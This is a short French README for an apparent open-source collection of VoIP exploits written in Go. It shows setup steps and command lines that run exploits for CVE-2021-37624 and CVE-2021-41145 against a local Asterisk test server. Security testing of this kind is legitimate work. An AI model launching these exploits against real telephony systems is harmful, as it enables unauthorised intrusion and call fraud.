
Une collection d'exploits pour différents produits VoIP.
en cours de développement
Une collection d'exploits pour différents produits VoIP. Merci au Go Exploit Framework.
Si vous êtes arrivé ici à la recherche d'une solution de test d'intrusion VoIP, jetez un œil à
Sippts (sippts-gui dans Kali) ou
SIPVicious. Ce projet est
davantage axé sur la phase d'exploitation.
git clone https://github.com/jesusprubio/bluebox.git
cd bluebox
go mod tidy
go mod vendor
Nous suivons les modèles recommandés par le Go Exploit Framework. Pour des raisons de commodité, les binaires ne sont pas inclus dans ce dépôt.
go run cve-2021-37624/main.go -v -rhost 127.0.0.1
go run cve-2021-37624/main.go -fll DEBUG -v -c -e -rhost 127.0.0.1 -rport 5061 -transport tls -msg ey -user dembele
go run cve-2021-41145/main.go -v -c -e -rhost 127.0.0.1 -fhost rand
Un fichier Docker Compose est fourni, incluant un serveur Asterisk pour tester.
task docker # Or `docker compose up -d`